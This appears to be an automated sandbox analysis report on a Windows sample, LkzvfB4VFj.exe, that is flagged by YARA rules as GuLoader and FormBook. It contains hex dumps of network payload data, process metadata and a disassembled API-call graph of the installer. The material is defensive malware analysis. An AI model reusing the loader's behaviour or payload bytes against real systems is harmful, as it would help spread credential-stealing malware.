                                                Data Ascii: Amff"@C@gJ|[xg^5FzI-xg|U)V?V4
                                                2024-11-08 13:23:34 UTC1255INData Raw: 53 8f fc bd c6 10 fd f9 00 24 87 1f a3 8c e6 68 13 09 8a c2 dd 99 d9 1d 23 07 d3 51 a9 90 e2 e4 ea df a5 4c ef 31 70 1b 75 26 e6 fa 41 03 49 17 3a 6a 94 d6 2b 91 a2 96 45 74 85 8d d0 aa ef 4e 9c 95 12 10 82 ab 8b 04 5c a5 41 0d 70 16 64 b2 31 85 f7 72 0e c1 75 65 81 3b b1 37 44 23 b2 b1 2b 05 23 07 5d aa 40 d0 5c c6 66 45 a0 6e 11 30 58 89 8a be 84 56 ee b4 14 fa 8e 97 5e a4 39 fa 27 dd 92 ff 98 f8 13 70 43 ff 96 01 34 1b d0 10 fb 02 1d 29 5a 6a 53 89 43 e9 94 ca b8 d5 6e f5 6d 3e 5e f5 fb 7b b3 c4 ba b0 3f 7f ba 0a 26 56 f8 06 f5 fc 59 6d a0 51 b0 01 99 63 78 36 a8 52 64 81 64 24 ce 7e f7 0f 86 7c 81 06 de 4c 25 9f 4f a8 ee 65 47 1b 90 e5 a4 38 52 d5 74 f5 5d 21 18 c9 34 9f ed 07 5d 5c 37 89 b7 12 7d 8f 99 c4 7b 3e 33 85 21 22 55 3f ed 10 b0 6a b9 dd 67
                                                Data Ascii: S$h#QL1pu&AI:j+EtN\Apd1rue;7D#+#]@\fEn0XV^9'pC4)ZjSCnm>^{?&VYmQcx6Rdd$~|L%OeG8Rt]!4]\7}{>3!"U?jg
                                                2024-11-08 13:23:34 UTC1255INData Raw: 49 24 24 27 cd b5 6b f3 f2 1a 10 2f 74 6f df e8 24 99 e6 15 0b 84 07 5f 1f 4d fc c7 ee 93 db fc 25 d2 8e ef 7f ff 8b 38 ad 0f 40 f2 c1 3e f9 b2 a7 16 93 f2 98 b4 7c 5a cf d5 e7 d0 83 28 dd a0 35 1b d7 be 60 7c 13 1d 18 e6 0f 9e d8 c6 44 eb 6a ee e2 62 09 6b a1 d9 c2 be 48 de 70 06 f4 3a ff f5 9d 54 a8 c4 96 53 24 1c 44 42 88 be 53 bd b7 df a8 e8 25 14 10 fa 44 86 ee 1e 48 ca b7 21 07 8f ad 37 f9 09 93 b2 5b 21 ad d1 b1 ed d9 4a 16 81 53 94 2b e3 30 fd e2 61 29 25 ea 73 cb bc 6e 1a 19 c1 08 73 9f 61 ec 6c ed f6 8b cf 5e 80 38 61 88 9a 8c ff a5 b2 d5 86 4c 94 15 c2 7d 05 c6 9f 45 49 e3 31 63 6b c0 ae ca 4c 46 7e d5 b0 cd 51 fd c5 b5 91 da fe 97 86 35 b3 ab 33 ad 56 4a 66 88 67 2a 66 44 2b 47 02 01 58 e5 60 61 41 3a d8 cd 3c f0 d2 08 af d8 2f b5 6c d7 40 07
                                                Data Ascii: I$$'k/to$_M%8@>|Z(5`|DjbkHp:TS$DBS%DH!7[!JS+0a)%snsal^8aL}EI1ckLF~Q53VJfg*fD+GX`aA:</l@
                                                2024-11-08 13:23:34 UTC1255INData Raw: 5f 5e 93 f4 34 b7 12 31 cb a9 49 a3 7b 6f 2a a3 a0 a3 b8 06 b5 27 fc fb 32 f0 42 b4 07 54 49 d6 8d 95 2a f7 59 b5 de 8c 98 95 2b af 44 1d 55 e5 98 89 1d 6f 23 01 d9 6d 0a dd 75 4e 4b 02 77 ba 65 74 c5 97 67 7e 8f 85 87 c7 99 cf 89 bc 00 8d 48 ae 98 08 ca 43 1a 5b b7 73 74 39 b3 1d f9 03 94 7e 97 81 40 be c4 a9 4e e6 c6 16 0d 04 eb 96 37 c0 1b 1e 99 e7 5a 50 28 3a 7b 9c 9a 52 a9 ba f0 12 65 8b fe 52 4b d6 2f 68 94 23 25 08 05 09 e6 74 d6 ab aa a2 75 4b ec 7b e1 2c 94 3e 89 c0 e0 79 bc 6b c0 13 21 bd 0a ae 91 cd cc 82 8b f5 23 09 e9 d2 ca 43 33 30 7c 8c b7 cf d4 e3 9a 53 86 17 ae 43 14 20 a0 f0 5e 05 d6 5a b2 e8 9a 0e 1b 57 f4 d3 5f da 1c 03 ec f3 dd df 68 96 e2 6d 34 7e 41 eb df dd 91 17 c8 a5 4d 55 1c 00 71 1e 86 46 51 25 10 b4 03 f0 9c 4b 18 31 ac c7 be
                                                Data Ascii: _^41I{o*'2BTI*Y+DUo#muNKwetg~HC[st9~@N7ZP(:{ReRK/h#%tuK{,>yk!#C30|SC ^ZW_hm4~AMUqFQ%K1
                                                2024-11-08 13:23:34 UTC1255INData Raw: b0 c1 51 44 f6 c4 69 39 39 d8 7b 98 88 59 3f 0e 8d dc 8f 34 7b 80 29 8c 80 ce 3e a4 0b f9 50 5b 65 b3 2e f7 bb e7 e7 ac 53 54 47 c2 ec 6e f3 fd 3a fe 43 14 5f 33 8f b8 cc 83 62 d7 9a ab a0 01 31 7d 1c 75 3a 7e 2f 30 cd 6e 80 a5 72 ea e1 c0 07 40 6e dd c1 40 1f b5 82 96 0e 57 54 8d 0e 04 35 39 d8 cb be 7e 82 38 d5 d4 33 ce 4a 3f 3b be a8 0c 48 14 87 01 f4 09 40 14 0c 19 1a 8d a9 c1 f0 53 01 58 9d 76 ad 04 e6 88 21 c8 e2 bc 4e ef d6 7b b3 64 6d dd ed 7c 60 b2 ca d4 40 d0 54 99 dc 01 14 bf ca 9f f2 fa 17 07 06 d0 56 d4 5b 5b 58 c0 17 e2 2b fc f6 ec 64 2e 85 c8 39 65 7d 99 07 05 fa 58 fd 2d f7 76 1c 30 94 47 5d 1b 75 35 ae 49 2c 0a ce fe 58 a5 3d b8 b8 ff aa e6 d2 7e 16 18 f1 e7 07 66 9e 99 ec dc 1d fe a4 74 b6 f6 61 37 2b ed 23 0b 10 a5 76 d8 04 86 6a 40 01
                                                Data Ascii: QDi99{Y?4{)>P[e.STGn:C_3b1}u:~/0nr@n@WT59~83J?;H@SXv!N{dm|`@TV[[X+d.9e}X-v0G]u5I,X=~fta7+#vj@
                                                2024-11-08 13:23:34 UTC1255INData Raw: 84 49 92 9f ea 50 77 26 42 99 a1 b2 92 49 e3 0b fc 65 0a d4 87 b2 4b 4c 5e 83 9a bf d1 6b 54 ed 79 b8 20 ab ec 36 de b7 19 a3 b8 37 92 ed 5a 9a 0d cd ac 31 f1 c3 e1 69 aa 7a 9e 00 38 c2 67 e0 6e 04 2d fa 43 f2 94 02 60 52 d9 2d e1 74 af 91 cf 20 90 0e 68 87 da aa fc 93 e9 f3 8c 69 31 9f 92 65 ad 8f 0a b8 34 a1 98 c4 17 f6 a2 2b 08 50 f8 8c 85 00 19 ce dc 7f 01 13 10 37 dd 20 69 5c 07 93 9b e3 8a e5 00 9f dc 7d ff 21 4d 52 28 13 5f 46 35 ad 18 54 c3 71 2f 6c ae d7 0b a9 9e d4 5e 05 ea 71 12 af 38 63 30 07 ae 80 c2 2e e6 f1 c6 55 09 61 c7 61 5f b7 c3 1a 50 f8 58 aa ce 23 5b 5a ad 8c f7 8a 7e e4 75 8e a8 e8 28 fe 28 47 e3 60 e1 5d 1b 16 a5 6d 70 55 d6 77 68 9f d7 05 3a 26 22 53 69 e6 7c 43 fd 27 70 2c 55 a8 d1 8d 28 81 29 83 6a 19 84 3b 9f 52 32 83 91 c7 6a
                                                Data Ascii: IPw&BIeKL^kTy 67Z1iz8gn-C`R-t hi1e4+P7 i\}!MR(_F5Tq/l^q8c0.Uaa_PX#[Z~u((G`]mpUwh:&"Si|C'p,U()j;R2j
                                                2024-11-08 13:23:34 UTC1255INData Raw: 74 af a4 6e d1 25 4f e2 43 46 69 b8 0f 05 dd 49 56 e3 91 1a 58 5c 40 96 29 e7 b2 40 69 14 f0 d8 6e 45 1c bc d4 0e 07 a0 80 a8 15 0f 0c 78 6c b5 b1 22 76 53 07 40 2b f2 81 a5 d6 4f cb 75 e4 aa 0d f5 7a 5f b3 fd ed cb 44 35 a9 94 ae fc a6 76 bb 80 2c e8 20 04 25 ec 0f 71 59 33 fc 0d 21 c4 f5 a0 c7 14 b5 fd ea 85 b0 fb a7 fe a5 a7 f3 eb c3 7a 4e 8a 95 f6 b9 4c fd 3c 96 17 9f 14 40 95 72 e0 2d 2e b7 f4 0c 36 bd 75 8d 36 ac 69 81 07 93 06 19 f3 6d d1 8e 77 cf de 44 1a e4 64 cd cc a2 b7 1c cb a1 13 ef 80 1b 4b 6e d3 3e b3 fe e8 be 17 40 82 90 95 70 90 88 f7 84 59 f9 b3 90 44 b7 32 3f 8b 3f 38 b6 df 45 3e b8 ea 85 a9 77 ce 79 7e f3 31 fd 18 1f aa 7c 81 d7 ba b8 05 5b 5c 33 3d 2c fa 1d 03 a1 8d 59 6e eb 43 2e c5 63 a4 8d 81 17 a8 c2 62 d8 13 fe ed 7b d9 5c 8f b8
                                                Data Ascii: tn%OCFiIVX\@)@inExl"vS@+Ouz_D5v, %qY3!zNL<@r-.6u6imwDdKn>@pYD2??8E>wy~1|[\3=,YnC.cb{\


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:08:21:39
                                                Start date:08/11/2024
                                                Path:C:\Users\user\Desktop\LkzvfB4VFj.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\LkzvfB4VFj.exe"
                                                Imagebase:0x400000
                                                File size:892'576 bytes
                                                MD5 hash:A5104B4D665DC081181FD163DCE0BB77
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.92764803526.0000000005D64000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:3
                                                Start time:08:23:24
                                                Start date:08/11/2024
                                                Path:C:\Users\user\Desktop\LkzvfB4VFj.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\LkzvfB4VFj.exe"
                                                Imagebase:0x400000
                                                File size:892'576 bytes
                                                MD5 hash:A5104B4D665DC081181FD163DCE0BB77
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.93680274957.0000000035BF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.93680274957.0000000035BF0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:4
                                                Start time:08:24:03
                                                Start date:08/11/2024
                                                Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                                Imagebase:0x140000000
                                                File size:16'696'840 bytes
                                                MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:false

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:19.7%
                                                  Dynamic/Decrypted Code Coverage:13.9%
                                                  Signature Coverage:16.3%
                                                  Total number of Nodes:1542
                                                  Total number of Limit Nodes:47
                                                  execution_graph 4872 401d44 4873 402bac 17 API calls 4872->4873 4874 401d52 SetWindowLongA 4873->4874 4875 402a5a 4874->4875 3864 401ec5 3872 402bac 3864->3872 3866 401ecb 3867 402bac 17 API calls 3866->3867 3868 401ed7 3867->3868 3869 401ee3 ShowWindow 3868->3869 3870 401eee EnableWindow 3868->3870 3871 402a5a 3869->3871 3870->3871 3875 40618a 3872->3875 3874 402bc1 3874->3866 3890 406197 3875->3890 3876 4063b9 3877 4063ce 3876->3877 3908 4060f7 lstrcpynA 3876->3908 3877->3874 3879 406393 lstrlenA 3879->3890 3882 40618a 10 API calls 3882->3879 3884 4062af GetSystemDirectoryA 3884->3890 3885 4062c2 GetWindowsDirectoryA 3885->3890 3887 4062f6 SHGetSpecialFolderLocation 3887->3890 3891 40630e SHGetPathFromIDListA CoTaskMemFree 3887->3891 3888 40618a 10 API calls 3888->3890 3889 40633c lstrcatA 3889->3890 3890->3876 3890->3879 3890->3882 3890->3884 3890->3885 3890->3887 3890->3888 3890->3889 3892 405fde 3890->3892 3897 4063d2 3890->3897 3906 406055 wsprintfA 3890->3906 3907 4060f7 lstrcpynA 3890->3907 3891->3890 3909 405f7d 3892->3909 3895 406012 RegQueryValueExA RegCloseKey 3896 406041 3895->3896 3896->3890 3898 4063de 3897->3898 3900 40643b CharNextA 3898->3900 3902 406446 3898->3902 3904 406429 CharNextA 3898->3904 3905 406436 CharNextA 3898->3905 3913 405aba 3898->3913 3899 40644a CharPrevA 3899->3902 3900->3898 3900->3902 3902->3899 3903 406465 3902->3903 3903->3890 3904->3898 3905->3900 3906->3890 3907->3890 3908->3877 3910 405f8c 3909->3910 3911 405f90 3910->3911 3912 405f95 RegOpenKeyExA 3910->3912 3911->3895 3911->3896 3912->3911 3914 405ac0 3913->3914 3915 405ad3 3914->3915 3916 405ac6 CharNextA 3914->3916 3915->3898 3916->3914 3917 401746 3923 402bce 3917->3923 3921 401754 3922 405cbf 2 API calls 3921->3922 3922->3921 3924 402bda 3923->3924 3925 40618a 17 API calls 3924->3925 3926 402bfb 3925->3926 3927 40174d 3926->3927 3928 4063d2 5 API calls 3926->3928 3929 405cbf 3927->3929 3928->3927 3930 405cca GetTickCount GetTempFileNameA 3929->3930 3931 405cfb 3930->3931 3932 405cf7 3930->3932 3931->3921 3932->3930 3932->3931 4876 4045c6 4877 4045d6 4876->4877 4878 4045fc 4876->4878 4883 40417b 4877->4883 4886 4041e2 4878->4886 4881 4045e3 SetDlgItemTextA 4881->4878 4884 40618a 17 API calls 4883->4884 4885 404186 SetDlgItemTextA 4884->4885 4885->4881 4887 4042a5 4886->4887 4888 4041fa GetWindowLongA 4886->4888 4888->4887 4889 40420f 4888->4889 4889->4887 4890 40423c GetSysColor 4889->4890 4891 40423f 4889->4891 4890->4891 4892 404245 SetTextColor 4891->4892 4893 40424f SetBkMode 4891->4893 4892->4893 4894 404267 GetSysColor 4893->4894 4895 40426d 4893->4895 4894->4895 4896 404274 SetBkColor 4895->4896 4897 40427e 4895->4897 4896->4897 4897->4887 4898 404291 DeleteObject 4897->4898 4899 404298 CreateBrushIndirect 4897->4899 4898->4899 4899->4887 4900 401947 4901 402bce 17 API calls 4900->4901 4902 40194e lstrlenA 4901->4902 4903 402620 4902->4903 3933 403348 SetErrorMode GetVersion 3934 403389 3933->3934 3935 40338f 3933->3935 3936 406500 5 API calls 3934->3936 4023 406492 GetSystemDirectoryA 3935->4023 3936->3935 3938 4033a5 lstrlenA 3938->3935 3939 4033b4 3938->3939 4026 406500 GetModuleHandleA 3939->4026 3942 406500 5 API calls 3943 4033c2 3942->3943 3944 406500 5 API calls 3943->3944 3945 4033ce #17 OleInitialize SHGetFileInfoA 3944->3945 4032 4060f7 lstrcpynA 3945->4032 3948 40341a GetCommandLineA 4033 4060f7 lstrcpynA 3948->4033 3950 40342c 3951 405aba CharNextA 3950->3951 3952 403455 CharNextA 3951->3952 3960 403465 3952->3960 3953 40352f 3954 403542 GetTempPathA 3953->3954 4034 403317 3954->4034 3956 40355a 3958 4035b4 DeleteFileA 3956->3958 3959 40355e GetWindowsDirectoryA lstrcatA 3956->3959 3957 405aba CharNextA 3957->3960 4044 402ea1 GetTickCount GetModuleFileNameA 3958->4044 3961 403317 12 API calls 3959->3961 3960->3953 3960->3957 3964 403531 3960->3964 3963 40357a 3961->3963 3963->3958 3966 40357e GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3963->3966 4129 4060f7 lstrcpynA 3964->4129 3965 4035c8 3972 405aba CharNextA 3965->3972 4005 40364e 3965->4005 4018 40365e 3965->4018 3968 403317 12 API calls 3966->3968 3970 4035ac 3968->3970 3970->3958 3970->4018 3974 4035e3 3972->3974 3980 403629 3974->3980 3981 40368e 3974->3981 3975 403796 3977 403818 ExitProcess 3975->3977 3978 40379e GetCurrentProcess OpenProcessToken 3975->3978 3976 403678 4153 405813 3976->4153 3983 4037e9 3978->3983 3984 4037b9 LookupPrivilegeValueA AdjustTokenPrivileges 3978->3984 4130 405b7d 3980->4130 4157 40577e 3981->4157 3988 406500 5 API calls 3983->3988 3984->3983 4000 4037f0 3988->4000 3991 4036a4 lstrcatA 3992 4036af lstrcatA lstrcmpiA 3991->3992 3995 4036cb 3992->3995 3992->4018 3993 403805 ExitWindowsEx 3993->3977 3996 403811 3993->3996 3998 4036d0 3995->3998 3999 4036d7 3995->3999 4177 40140b 3996->4177 3997 403643 4145 4060f7 lstrcpynA 3997->4145 4160 4056e4 CreateDirectoryA 3998->4160 4165 405761 CreateDirectoryA 3999->4165 4000->3993 4000->3996 4072 40390a 4005->4072 4007 4036dc SetCurrentDirectoryA 4008 4036f6 4007->4008 4009 4036eb 4007->4009 4169 4060f7 lstrcpynA 4008->4169 4168 4060f7 lstrcpynA 4009->4168 4012 40618a 17 API calls 4013 403735 DeleteFileA 4012->4013 4014 403742 CopyFileA 4013->4014 4020 403704 4013->4020 4014->4020 4015 40378a 4016 405ed6 36 API calls 4015->4016 4016->4018 4146 403830 4018->4146 4019 40618a 17 API calls 4019->4020 4020->4012 4020->4015 4020->4019 4022 403776 CloseHandle 4020->4022 4170 405ed6 MoveFileExA 4020->4170 4174 405796 CreateProcessA 4020->4174 4022->4020 4024 4064b4 wsprintfA LoadLibraryExA 4023->4024 4024->3938 4027 406526 GetProcAddress 4026->4027 4028 40651c 4026->4028 4030 4033bb 4027->4030 4029 406492 3 API calls 4028->4029 4031 406522 4029->4031 4030->3942 4031->4027 4031->4030 4032->3948 4033->3950 4035 4063d2 5 API calls 4034->4035 4036 403323 4035->4036 4037 40332d 4036->4037 4180 405a8f lstrlenA CharPrevA 4036->4180 4037->3956 4040 405761 2 API calls 4041 40333b 4040->4041 4042 405cbf 2 API calls 4041->4042 4043 403346 4042->4043 4043->3956 4183 405c90 GetFileAttributesA CreateFileA 4044->4183 4046 402ee1 4064 402ef1 4046->4064 4184 4060f7 lstrcpynA 4046->4184 4048 402f07 4185 405ad6 lstrlenA 4048->4185 4052 402f18 GetFileSize 4053 403012 4052->4053 4071 402f2f 4052->4071 4190 402e3d 4053->4190 4055 40301b 4057 40304b GlobalAlloc 4055->4057 4055->4064 4225 403300 SetFilePointer 4055->4225 4201 403300 SetFilePointer 4057->4201 4059 40307e 4063 402e3d 6 API calls 4059->4063 4061 403034 4065 4032ea ReadFile 4061->4065 4062 403066 4202 4030d8 4062->4202 4063->4064 4064->3965 4067 40303f 4065->4067 4067->4057 4067->4064 4068 402e3d 6 API calls 4068->4071 4069 403072 4069->4064 4069->4069 4070 4030af SetFilePointer 4069->4070 4070->4064 4071->4053 4071->4059 4071->4064 4071->4068 4222 4032ea 4071->4222 4073 406500 5 API calls 4072->4073 4074 40391e 4073->4074 4075 403924 4074->4075 4076 403936 4074->4076 4254 406055 wsprintfA 4075->4254 4077 405fde 3 API calls 4076->4077 4078 403961 4077->4078 4080 40397f lstrcatA 4078->4080 4081 405fde 3 API calls 4078->4081 4082 403934 4080->4082 4081->4080 4246 403bcf 4082->4246 4085 405b7d 18 API calls 4086 4039b1 4085->4086 4087 403a3a 4086->4087 4089 405fde 3 API calls 4086->4089 4088 405b7d 18 API calls 4087->4088 4090 403a40 4088->4090 4091 4039dd 4089->4091 4092 403a50 LoadImageA 4090->4092 4093 40618a 17 API calls 4090->4093 4091->4087 4099 4039f9 lstrlenA 4091->4099 4103 405aba CharNextA 4091->4103 4094 403af6 4092->4094 4095 403a77 RegisterClassA 4092->4095 4093->4092 4098 40140b 2 API calls 4094->4098 4096 403b00 4095->4096 4097 403aad SystemParametersInfoA CreateWindowExA 4095->4097 4096->4018 4097->4094 4102 403afc 4098->4102 4100 403a07 lstrcmpiA 4099->4100 4101 403a2d 4099->4101 4100->4101 4104 403a17 GetFileAttributesA 4100->4104 4105 405a8f 3 API calls 4101->4105 4102->4096 4108 403bcf 18 API calls 4102->4108 4106 4039f7 4103->4106 4107 403a23 4104->4107 4109 403a33 4105->4109 4106->4099 4107->4101 4110 405ad6 2 API calls 4107->4110 4111 403b0d 4108->4111 4255 4060f7 lstrcpynA 4109->4255 4110->4101 4113 403b19 ShowWindow 4111->4113 4114 403b9c 4111->4114 4116 406492 3 API calls 4113->4116 4256 4052f0 OleInitialize 4114->4256 4120 403b31 4116->4120 4117 403ba2 4118 403ba6 4117->4118 4119 403bbe 4117->4119 4118->4096 4127 40140b 2 API calls 4118->4127 4122 40140b 2 API calls 4119->4122 4121 403b3f GetClassInfoA 4120->4121 4123 406492 3 API calls 4120->4123 4124 403b53 GetClassInfoA RegisterClassA 4121->4124 4125 403b69 DialogBoxParamA 4121->4125 4122->4096 4123->4121 4124->4125 4126 40140b 2 API calls 4125->4126 4128 403b91 4126->4128 4127->4096 4128->4096 4129->3954 4274 4060f7 lstrcpynA 4130->4274 4132 405b8e 4275 405b28 CharNextA CharNextA 4132->4275 4135 403634 4135->4018 4144 4060f7 lstrcpynA 4135->4144 4136 4063d2 5 API calls 4142 405ba4 4136->4142 4137 405bcf lstrlenA 4138 405bda 4137->4138 4137->4142 4140 405a8f 3 API calls 4138->4140 4141 405bdf GetFileAttributesA 4140->4141 4141->4135 4142->4135 4142->4137 4143 405ad6 2 API calls 4142->4143 4281 40646b FindFirstFileA 4142->4281 4143->4137 4144->3997 4145->4005 4147 403848 4146->4147 4148 40383a CloseHandle 4146->4148 4284 403875 4147->4284 4148->4147 4155 405828 4153->4155 4154 403686 ExitProcess 4155->4154 4156 40583c MessageBoxIndirectA 4155->4156 4156->4154 4158 406500 5 API calls 4157->4158 4159 403693 lstrcatA 4158->4159 4159->3991 4159->3992 4161 405735 GetLastError 4160->4161 4162 4036d5 4160->4162 4161->4162 4163 405744 SetFileSecurityA 4161->4163 4162->4007 4163->4162 4164 40575a GetLastError 4163->4164 4164->4162 4166 405771 4165->4166 4167 405775 GetLastError 4165->4167 4166->4007 4167->4166 4168->4008 4169->4020 4171 405ef7 4170->4171 4172 405eea 4170->4172 4171->4020 4341 405d66 4172->4341 4175 4057d5 4174->4175 4176 4057c9 CloseHandle 4174->4176 4175->4020 4176->4175 4178 401389 2 API calls 4177->4178 4179 401420 4178->4179 4179->3977 4181 403335 4180->4181 4182 405aa9 lstrcatA 4180->4182 4181->4040 4182->4181 4183->4046 4184->4048 4186 405ae3 4185->4186 4187 402f0d 4186->4187 4188 405ae8 CharPrevA 4186->4188 4189 4060f7 lstrcpynA 4187->4189 4188->4186 4188->4187 4189->4052 4191 402e46 4190->4191 4192 402e5e 4190->4192 4193 402e56 4191->4193 4194 402e4f DestroyWindow 4191->4194 4195 402e66 4192->4195 4196 402e6e GetTickCount 4192->4196 4193->4055 4194->4193 4226 40653c 4195->4226 4198 402e7c CreateDialogParamA ShowWindow 4196->4198 4199 402e9f 4196->4199 4198->4199 4199->4055 4201->4062 4203 4030ee 4202->4203 4204 40311c 4203->4204 4232 403300 SetFilePointer 4203->4232 4206 4032ea ReadFile 4204->4206 4207 403127 4206->4207 4208 403283 4207->4208 4209 403139 GetTickCount 4207->4209 4211 40326d 4207->4211 4210 4032c5 4208->4210 4215 403287 4208->4215 4209->4211 4218 403188 4209->4218 4212 4032ea ReadFile 4210->4212 4211->4069 4212->4211 4213 4032ea ReadFile 4213->4218 4214 4032ea ReadFile 4214->4215 4215->4211 4215->4214 4216 405d37 WriteFile 4215->4216 4216->4215 4217 4031de GetTickCount 4217->4218 4218->4211 4218->4213 4218->4217 4219 403203 MulDiv wsprintfA 4218->4219 4230 405d37 WriteFile 4218->4230 4233 40521e 4219->4233 4244 405d08 ReadFile 4222->4244 4225->4061 4227 406559 PeekMessageA 4226->4227 4228 402e6c 4227->4228 4229 40654f DispatchMessageA 4227->4229 4228->4055 4229->4227 4231 405d55 4230->4231 4231->4218 4232->4204 4234 4052dc 4233->4234 4235 405239 4233->4235 4234->4218 4236 405256 lstrlenA 4235->4236 4237 40618a 17 API calls 4235->4237 4238 405264 lstrlenA 4236->4238 4239 40527f 4236->4239 4237->4236 4238->4234 4240 405276 lstrcatA 4238->4240 4241 405292 4239->4241 4242 405285 SetWindowTextA 4239->4242 4240->4239 4241->4234 4243 405298 SendMessageA SendMessageA SendMessageA 4241->4243 4242->4241 4243->4234 4245 4032fd 4244->4245 4245->4071 4247 403be3 4246->4247 4263 406055 wsprintfA 4247->4263 4249 403c54 4264 403c88 4249->4264 4251 40398f 4251->4085 4252 403c59 4252->4251 4253 40618a 17 API calls 4252->4253 4253->4252 4254->4082 4255->4087 4267 4041c7 4256->4267 4258 4041c7 SendMessageA 4259 40534c OleUninitialize 4258->4259 4259->4117 4261 40533a 4261->4258 4262 405313 4262->4261 4270 401389 4262->4270 4263->4249 4265 40618a 17 API calls 4264->4265 4266 403c96 SetWindowTextA 4265->4266 4266->4252 4268 4041d0 SendMessageA 4267->4268 4269 4041df 4267->4269 4268->4269 4269->4262 4272 401390 4270->4272 4271 4013fe 4271->4262 4272->4271 4273 4013cb MulDiv SendMessageA 4272->4273 4273->4272 4274->4132 4276 405b43 4275->4276 4279 405b53 4275->4279 4278 405b4e CharNextA 4276->4278 4276->4279 4277 405b73 4277->4135 4277->4136 4278->4277 4279->4277 4280 405aba CharNextA 4279->4280 4280->4279 4282 406481 FindClose 4281->4282 4283 40648c 4281->4283 4282->4283 4283->4142 4285 403883 4284->4285 4286 403888 FreeLibrary GlobalFree 4285->4286 4287 40384d 4285->4287 4286->4286 4286->4287 4288 4058bf 4287->4288 4289 405b7d 18 API calls 4288->4289 4290 4058df 4289->4290 4291 4058e7 DeleteFileA 4290->4291 4292 4058fe 4290->4292 4296 403667 OleUninitialize 4291->4296 4293 405a2c 4292->4293 4328 4060f7 lstrcpynA 4292->4328 4293->4296 4301 40646b 2 API calls 4293->4301 4295 405924 4297 405937 4295->4297 4298 40592a lstrcatA 4295->4298 4296->3975 4296->3976 4300 405ad6 2 API calls 4297->4300 4299 40593d 4298->4299 4302 40594b lstrcatA 4299->4302 4304 405956 lstrlenA FindFirstFileA 4299->4304 4300->4299 4303 405a50 4301->4303 4302->4304 4303->4296 4305 405a54 4303->4305 4304->4293 4311 40597a 4304->4311 4306 405a8f 3 API calls 4305->4306 4308 405a5a 4306->4308 4307 405aba CharNextA 4307->4311 4309 405877 5 API calls 4308->4309 4310 405a66 4309->4310 4312 405a80 4310->4312 4313 405a6a 4310->4313 4311->4307 4316 405a0b FindNextFileA 4311->4316 4325 4059cc 4311->4325 4329 4060f7 lstrcpynA 4311->4329 4315 40521e 24 API calls 4312->4315 4313->4296 4317 40521e 24 API calls 4313->4317 4315->4296 4316->4311 4318 405a23 FindClose 4316->4318 4319 405a77 4317->4319 4318->4293 4320 405ed6 36 API calls 4319->4320 4323 405a7e 4320->4323 4322 4058bf 60 API calls 4322->4325 4323->4296 4324 40521e 24 API calls 4324->4316 4325->4316 4325->4322 4325->4324 4326 40521e 24 API calls 4325->4326 4327 405ed6 36 API calls 4325->4327 4330 405877 4325->4330 4326->4325 4327->4325 4328->4295 4329->4311 4338 405c6b GetFileAttributesA 4330->4338 4333 4058a4 4333->4325 4334 405892 RemoveDirectoryA 4336 4058a0 4334->4336 4335 40589a DeleteFileA 4335->4336 4336->4333 4337 4058b0 SetFileAttributesA 4336->4337 4337->4333 4339 405883 4338->4339 4340 405c7d SetFileAttributesA 4338->4340 4339->4333 4339->4334 4339->4335 4340->4339 4342 405db2 GetShortPathNameA 4341->4342 4343 405d8c 4341->4343 4345 405ed1 4342->4345 4346 405dc7 4342->4346 4368 405c90 GetFileAttributesA CreateFileA 4343->4368 4345->4171 4346->4345 4348 405dcf wsprintfA 4346->4348 4347 405d96 CloseHandle GetShortPathNameA 4347->4345 4349 405daa 4347->4349 4350 40618a 17 API calls 4348->4350 4349->4342 4349->4345 4351 405df7 4350->4351 4369 405c90 GetFileAttributesA CreateFileA 4351->4369 4353 405e04 4353->4345 4354 405e13 GetFileSize GlobalAlloc 4353->4354 4355 405e35 4354->4355 4356 405eca CloseHandle 4354->4356 4357 405d08 ReadFile 4355->4357 4356->4345 4358 405e3d 4357->4358 4358->4356 4370 405bf5 lstrlenA 4358->4370 4361 405e54 lstrcpyA 4364 405e76 4361->4364 4362 405e68 4363 405bf5 4 API calls 4362->4363 4363->4364 4365 405ead SetFilePointer 4364->4365 4366 405d37 WriteFile 4365->4366 4367 405ec3 GlobalFree 4366->4367 4367->4356 4368->4347 4369->4353 4371 405c36 lstrlenA 4370->4371 4372 405c3e 4371->4372 4373 405c0f lstrcmpiA 4371->4373 4372->4361 4372->4362 4373->4372 4374 405c2d CharNextA 4373->4374 4374->4371 4904 6feb2be3 4905 6feb2bfb 4904->4905 4906 6feb1534 2 API calls 4905->4906 4907 6feb2c16 4906->4907 4908 4038c8 4909 4038d3 4908->4909 4910 4038d7 4909->4910 4911 4038da GlobalAlloc 4909->4911 4911->4910 4915 6feb10e0 4917 6feb110e 4915->4917 4916 6feb11c4 GlobalFree 4917->4916 4918 6feb12ad 2 API calls 4917->4918 4919 6feb11c3 4917->4919 4920 6feb1266 2 API calls 4917->4920 4921 6feb1155 GlobalAlloc 4917->4921 4922 6feb11ea GlobalFree 4917->4922 4923 6feb11b1 GlobalFree 4917->4923 4924 6feb12d1 lstrcpyA 4917->4924 4918->4917 4919->4916 4920->4923 